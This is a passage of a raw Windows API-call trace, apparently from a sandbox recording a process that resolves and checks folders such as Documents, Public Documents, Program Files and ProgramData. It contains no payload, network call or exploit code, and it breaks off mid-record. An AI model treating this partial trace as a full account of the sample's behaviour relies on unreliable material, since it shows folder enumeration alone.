SysReAllocStringLen (in: pbstr=0x13ffa98*=0x0, psz="c:\\Windows\\", len=0xb | out: pbstr=0x13ffa98*="c:\\Windows\\") returned 1 [0052.653] SysReAllocStringLen (in: pbstr=0x13ffdec*="c:\\Windows\\", psz="c:\\Windows", len=0xa | out: pbstr=0x13ffdec*="c:\\Windows") returned 1 [0052.653] SysReAllocStringLen (in: pbstr=0x13ffdf0*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x13ffdf0*="c:\\Windows") returned 1 [0052.653] SysReAllocStringLen (in: pbstr=0xe60054*=0x0, psz="c:\\Windows\\", len=0xb | out: pbstr=0xe60054*="c:\\Windows\\") returned 1 [0052.653] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0xe63ea8 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0052.654] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\Documents", cchLength=0x19 | out: lpsz="c:\\users\\fd1hvy\\documents") returned 0x19 [0052.654] SysReAllocStringLen (in: pbstr=0xe60094*=0x0, psz="c:\\users\\fd1hvy\\documents", len=0x19 | out: pbstr=0xe60094*="c:\\users\\fd1hvy\\documents") returned 1 [0052.654] SysReAllocStringLen (in: pbstr=0xe60098*=0x0, psz="c:", len=0x2 | out: pbstr=0xe60098*="c:") returned 1 [0052.654] SysReAllocStringLen (in: pbstr=0xe20790*=0x0, psz="users", len=0x5 | out: pbstr=0xe20790*="users") returned 1 [0052.654] SysReAllocStringLen (in: pbstr=0xe2267c*=0x0, psz="fd1hvy", len=0x6 | out: pbstr=0xe2267c*="fd1hvy") returned 1 [0052.654] SysReAllocStringLen (in: pbstr=0xe20818*=0x0, psz="documents", len=0x9 | out: pbstr=0xe20818*="documents") returned 1 [0052.654] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="users", cchWideChar=5, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="usersws2", lpUsedDefaultChar=0x0) returned 5 [0052.673] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="fd1hvy", cchWideChar=6, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fd1hvys2", lpUsedDefaultChar=0x0) returned 6 [0052.673] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="documents", cchWideChar=9, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="documents", lpUsedDefaultChar=0x0) returned 9 [0052.673] SysReAllocStringLen (in: pbstr=0x13ffab0*=0x0, psz="c:", len=0x2 | out: pbstr=0x13ffab0*="c:") returned 1 [0052.673] SysReAllocStringLen (in: pbstr=0x13ffde0*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x13ffde0*="c:\\") returned 1 [0052.673] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="users", len=0x5 | out: pbstr=0x13ffaa8*="users") returned 1 [0052.674] FindFirstFileW (in: lpFileName="c:\\users", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6a2b0 [0052.674] FindNextFileW (in: hFindFile=0x6a2b0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0052.674] GetLastError () returned 0x12 [0052.674] FindClose (in: hFindFile=0x6a2b0 | out: hFindFile=0x6a2b0) returned 1 [0052.674] SysReAllocStringLen (in: pbstr=0x13ffa9c*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x13ffa9c*="c:\\Users") returned 1 [0052.674] SysReAllocStringLen (in: pbstr=0x13ffde0*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x13ffde0*="c:\\Users\\") returned 1 [0052.674] SysReAllocStringLen (in: pbstr=0x13ffaa8*="users", psz="fd1hvy", len=0x6 | out: pbstr=0x13ffaa8*="fd1hvy") returned 1 [0052.674] FindFirstFileW (in: lpFileName="c:\\Users\\fd1hvy", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x6a330 [0052.675] FindNextFileW (in: hFindFile=0x6a330, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0 [0052.675] GetLastError () returned 0x12 [0052.675] FindClose (in: hFindFile=0x6a330 | out: hFindFile=0x6a330) returned 1 [0052.675] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\", psz="c:\\Users\\FD1HVy", len=0xf | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy") returned 1 [0052.675] SysReAllocStringLen (in: pbstr=0x13ffde0*="c:\\Users\\FD1HVy", psz="c:\\Users\\FD1HVy\\", len=0x10 | out: pbstr=0x13ffde0*="c:\\Users\\FD1HVy\\") returned 1 [0052.675] SysReAllocStringLen (in: pbstr=0x13ffaa8*="fd1hvy", psz="documents", len=0x9 | out: pbstr=0x13ffaa8*="documents") returned 1 [0052.675] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\documents", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe514c648, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe514c648, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x6a2b0 [0052.675] FindNextFileW (in: hFindFile=0x6a2b0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe514c648, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe514c648, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0 [0052.675] GetLastError () returned 0x12 [0052.675] FindClose (in: hFindFile=0x6a2b0 | out: hFindFile=0x6a2b0) returned 1 [0052.675] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\", psz="c:\\Users\\FD1HVy\\Documents", len=0x19 | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\Documents") returned 1 [0052.675] SysReAllocStringLen (in: pbstr=0x13ffde0*="c:\\Users\\FD1HVy\\Documents", psz="c:\\Users\\FD1HVy\\Documents\\", len=0x1a | out: pbstr=0x13ffde0*="c:\\Users\\FD1HVy\\Documents\\") returned 1 [0052.676] SysReAllocStringLen (in: pbstr=0x13ffa98*=0x0, psz="c:\\Users\\FD1HVy\\Documents\\", len=0x1a | out: pbstr=0x13ffa98*="c:\\Users\\FD1HVy\\Documents\\") returned 1 [0052.676] SysReAllocStringLen (in: pbstr=0x13ffde0*="c:\\Users\\FD1HVy\\Documents\\", psz="c:\\Users\\FD1HVy\\Documents", len=0x19 | out: pbstr=0x13ffde0*="c:\\Users\\FD1HVy\\Documents") returned 1 [0052.676] SysReAllocStringLen (in: pbstr=0x13ffde4*=0x0, psz="c:\\Users\\FD1HVy\\Documents", len=0x19 | out: pbstr=0x13ffde4*="c:\\Users\\FD1HVy\\Documents") returned 1 [0052.676] SysReAllocStringLen (in: pbstr=0xe60050*=0x0, psz="c:\\Users\\FD1HVy\\Documents\\", len=0x1a | out: pbstr=0xe60050*="c:\\Users\\FD1HVy\\Documents\\") returned 1 [0052.676] SHGetFolderPathW (in: hwnd=0x0, csidl=46, hToken=0x0, dwFlags=0x0, pszPath=0xe63ea8 | out: pszPath="C:\\Users\\Public\\Documents") returned 0x0 [0052.677] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents", cchLength=0x19 | out: lpsz="c:\\users\\public\\documents") returned 0x19 [0052.677] SysReAllocStringLen (in: pbstr=0xe60094*=0x0, psz="c:\\users\\public\\documents", len=0x19 | out: pbstr=0xe60094*="c:\\users\\public\\documents") returned 1 [0052.677] SysReAllocStringLen (in: pbstr=0xe60098*=0x0, psz="c:", len=0x2 | out: pbstr=0xe60098*="c:") returned 1 [0052.677] SysReAllocStringLen (in: pbstr=0xe20818*=0x0, psz="users", len=0x5 | out: pbstr=0xe20818*="users") returned 1 [0052.677] SysReAllocStringLen (in: pbstr=0xe2267c*=0x0, psz="public", len=0x6 | out: pbstr=0xe2267c*="public") returned 1 [0052.677] SysReAllocStringLen (in: pbstr=0xe20790*=0x0, psz="documents", len=0x9 | out: pbstr=0xe20790*="documents") returned 1 [0052.677] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="users", cchWideChar=5, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="usersents", lpUsedDefaultChar=0x0) returned 5 [0052.677] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="public", cchWideChar=6, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="publicnts", lpUsedDefaultChar=0x0) returned 6 [0052.677] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="documents", cchWideChar=9, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="documents", lpUsedDefaultChar=0x0) returned 9 [0052.678] SysReAllocStringLen (in: pbstr=0x13ffab0*=0x0, psz="c:", len=0x2 | out: pbstr=0x13ffab0*="c:") returned 1 [0052.678] SysReAllocStringLen (in: pbstr=0x13ffdd4*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x13ffdd4*="c:\\") returned 1 [0052.678] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="users", len=0x5 | out: pbstr=0x13ffaa8*="users") returned 1 [0052.678] FindFirstFileW (in: lpFileName="c:\\users", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6a130 [0052.678] FindNextFileW (in: hFindFile=0x6a130, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0052.678] GetLastError () returned 0x12 [0052.678] FindClose (in: hFindFile=0x6a130 | out: hFindFile=0x6a130) returned 1 [0052.678] SysReAllocStringLen (in: pbstr=0x13ffa9c*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x13ffa9c*="c:\\Users") returned 1 [0052.678] SysReAllocStringLen (in: pbstr=0x13ffdd4*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x13ffdd4*="c:\\Users\\") returned 1 [0052.678] SysReAllocStringLen (in: pbstr=0x13ffaa8*="users", psz="public", len=0x6 | out: pbstr=0x13ffaa8*="public") returned 1 [0052.678] FindFirstFileW (in: lpFileName="c:\\Users\\public", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0x69fb0 [0052.678] FindNextFileW (in: hFindFile=0x69fb0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0052.678] GetLastError () returned 0x12 [0052.678] FindClose (in: hFindFile=0x69fb0 | out: hFindFile=0x69fb0) returned 1 [0052.679] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\", psz="c:\\Users\\Public", len=0xf | out: pbstr=0x13ffa9c*="c:\\Users\\Public") returned 1 [0052.679] SysReAllocStringLen (in: pbstr=0x13ffdd4*="c:\\Users\\Public", psz="c:\\Users\\Public\\", len=0x10 | out: pbstr=0x13ffdd4*="c:\\Users\\Public\\") returned 1 [0052.679] SysReAllocStringLen (in: pbstr=0x13ffaa8*="public", psz="documents", len=0x9 | out: pbstr=0x13ffaa8*="documents") returned 1 [0052.679] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\documents", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x69e70 [0052.679] FindNextFileW (in: hFindFile=0x69e70, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0 [0052.679] GetLastError () returned 0x12 [0052.679] FindClose (in: hFindFile=0x69e70 | out: hFindFile=0x69e70) returned 1 [0052.679] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\Public\\", psz="c:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x13ffa9c*="c:\\Users\\Public\\Documents") returned 1 [0052.679] SysReAllocStringLen (in: pbstr=0x13ffdd4*="c:\\Users\\Public\\Documents", psz="c:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x13ffdd4*="c:\\Users\\Public\\Documents\\") returned 1 [0052.680] SysReAllocStringLen (in: pbstr=0x13ffa98*=0x0, psz="c:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x13ffa98*="c:\\Users\\Public\\Documents\\") returned 1 [0052.680] SysReAllocStringLen (in: pbstr=0x13ffdd4*="c:\\Users\\Public\\Documents\\", psz="c:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x13ffdd4*="c:\\Users\\Public\\Documents") returned 1 [0052.680] SysReAllocStringLen (in: pbstr=0x13ffdd8*=0x0, psz="c:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x13ffdd8*="c:\\Users\\Public\\Documents") returned 1 [0052.680] SysReAllocStringLen (in: pbstr=0xe60064*=0x0, psz="c:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0xe60064*="c:\\Users\\Public\\Documents\\") returned 1 [0052.680] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0xe63ea8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0052.680] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)", cchLength=0x16 | out: lpsz="c:\\program files (x86)") returned 0x16 [0052.680] SysReAllocStringLen (in: pbstr=0xe60094*=0x0, psz="c:\\program files (x86)", len=0x16 | out: pbstr=0xe60094*="c:\\program files (x86)") returned 1 [0052.680] SysReAllocStringLen (in: pbstr=0xe60098*=0x0, psz="c:", len=0x2 | out: pbstr=0xe60098*="c:") returned 1 [0052.681] SysReAllocStringLen (in: pbstr=0xe20790*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0xe20790*="program files (x86)") returned 1 [0052.681] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="program files (x86)", cchWideChar=19, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="program files (x86)\x01", lpUsedDefaultChar=0x0) returned 19 [0052.681] SysReAllocStringLen (in: pbstr=0x13ffab0*=0x0, psz="c:", len=0x2 | out: pbstr=0x13ffab0*="c:") returned 1 [0052.681] SysReAllocStringLen (in: pbstr=0x13ffdc8*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x13ffdc8*="c:\\") returned 1 [0052.681] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x13ffaa8*="program files (x86)") returned 1 [0052.681] FindFirstFileW (in: lpFileName="c:\\program files (x86)", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7a165b3, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe7a165b3, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0x6a4f0 [0052.681] FindNextFileW (in: hFindFile=0x6a4f0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7a165b3, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe7a165b3, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0 [0052.681] GetLastError () returned 0x12 [0052.681] FindClose (in: hFindFile=0x6a4f0 | out: hFindFile=0x6a4f0) returned 1 [0052.681] SysReAllocStringLen (in: pbstr=0x13ffa9c*=0x0, psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x13ffa9c*="c:\\Program Files (x86)") returned 1 [0052.681] SysReAllocStringLen (in: pbstr=0x13ffdc8*="c:\\Program Files (x86)", psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x13ffdc8*="c:\\Program Files (x86)\\") returned 1 [0052.682] SysReAllocStringLen (in: pbstr=0x13ffa98*=0x0, psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x13ffa98*="c:\\Program Files (x86)\\") returned 1 [0052.682] SysReAllocStringLen (in: pbstr=0x13ffdc8*="c:\\Program Files (x86)\\", psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x13ffdc8*="c:\\Program Files (x86)") returned 1 [0052.682] SysReAllocStringLen (in: pbstr=0x13ffdcc*=0x0, psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x13ffdcc*="c:\\Program Files (x86)") returned 1 [0052.682] SysReAllocStringLen (in: pbstr=0xe60068*=0x0, psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0xe60068*="c:\\Program Files (x86)\\") returned 1 [0052.682] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0xe63ea8 | out: pszPath="C:\\ProgramData") returned 0x0 [0052.682] CharLowerBuffW (in: lpsz="C:\\ProgramData", cchLength=0xe | out: lpsz="c:\\programdata") returned 0xe [0052.682] SysReAllocStringLen (in: pbstr=0xe60094*=0x0, psz="c:\\programdata", len=0xe | out: pbstr=0xe60094*="c:\\programdata") returned 1 [0052.682] SysReAllocStringLen (in: pbstr=0xe60098*=0x0, psz="c:", len=0x2 | out: pbstr=0xe60098*="c:") returned 1 [0052.683] SysReAllocStringLen (in: pbstr=0xe2267c*=0x0, psz="programdata", len=0xb | out: pbstr=0xe2267c*="programdata") returned 1 [0052.683] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="programdata", cchWideChar=11, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="programdataes (x86)\x01", lpUsedDefaultChar=0x0) returned 11 [0052.683] SysReAllocStringLen (in: pbstr=0x13ffab0*=0x0, psz="c:", len=0x2 | out: pbstr=0x13ffab0*="c:") returned 1 [0052.683] SysReAllocStringLen (in: pbstr=0x13ffdbc*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x13ffdbc*="c:\\") returned 1 [0052.683] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="programdata", len=0xb | out: pbstr=0x13ffaa8*="programdata") returned 1 [0052.683] FindFirstFileW (in: lpFileName="c:\\programdata", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 0x69ef0 [0052.683] FindNextFileW (in: hFindFile=0x69ef0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 0 [0052.683] GetLastError () returned 0x12 [0052.683] FindClose (in: hFindFile=0x69ef0 | out: hFindFile=0x69ef0) returned 1 [0052.684] SysReAllocStringLen (in: pbstr=0x13ffa9c*=0x0, psz="c:\\ProgramData", len=0xe | out: pbstr=0x13ffa9c*="c:\\ProgramData") returned 1 [0052.684] SysReAllocStringLen (in: pbstr=0x13ffdbc*="c:\\ProgramData", psz="c:\\ProgramData\\", len=0xf | out: pbstr=0x13ffdbc*="c:\\ProgramData\\") returned 1 [0052.684] SysReAllocStringLen (in: pbstr=0x13ffa98*=0x0, psz="c:\\ProgramData\\", len=0xf | out: pbstr=0x13ffa98*="c:\\ProgramData\\") returned 1 [0052.684] SysReAllocStringLen (in: pbstr=0x13ffdbc*="c:\\ProgramData\\", psz="c:\\ProgramData", len=0xe | out: pbstr=0x13ffdbc*="c:\\ProgramData") returned 1 [0052.685] SysReAllocStringLen (in: pbstr=0x13ffdc0*=0x0, psz="c:\\ProgramData", len=0xe | out: pbstr=0x13ffdc0*="c:\\ProgramData") returned 1 [0052.685] SysReAllocStringLen (in: pbstr=0xe6006c*=0x0, psz="c:\\ProgramData\\", len=0xf | out: pbstr=0xe6006c*="c:\\ProgramData\\") returned 1 [0052.685] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0xe63ea8 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0052.685] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\Common Files", cchLength=0x23 | out: lpsz="c:\\program files (x86)\\common files") returned 0x23 [0052.685] SysReAllocStringLen (in: pbstr=0xe60094*=0x0, psz="c:\\program files (x86)\\common files", len=0x23 | out: pbstr=0xe60094*="c:\\program files (x86)\\common files") returned 1 [0052.685] SysReAllocStringLen (in: pbstr=0xe60098*=0x0, psz="c:", len=0x2 | out: pbstr=0xe60098*="c:") returned 1 [0052.685] SysReAllocStringLen (in: pbstr=0xe20818*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0xe20818*="program files (x86)") returned 1 [0052.685] SysReAllocStringLen (in: pbstr=0xe20790*=0x0, psz="common files", len=0xc | out: pbstr=0xe20790*="common files") returned 1 [0052.686] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="program files (x86)", cchWideChar=19, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="program files (x86)\x01", lpUsedDefaultChar=0x0) returned 19 [0052.686] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="common files", cchWideChar=12, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="common filess (x86)\x01", lpUsedDefaultChar=0x0) returned 12 [0052.686] SysReAllocStringLen (in: pbstr=0x13ffab0*=0x0, psz="c:", len=0x2 | out: pbstr=0x13ffab0*="c:") returned 1 [0052.686] SysReAllocStringLen (in: pbstr=0x13ffdb0*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x13ffdb0*="c:\\") returned 1 [0052.686] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x13ffaa8*="program files (x86)") returned 1 [0052.687] FindFirstFileW (in: lpFileName="c:\\program files (x86)", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7a165b3, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe7a165b3, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", 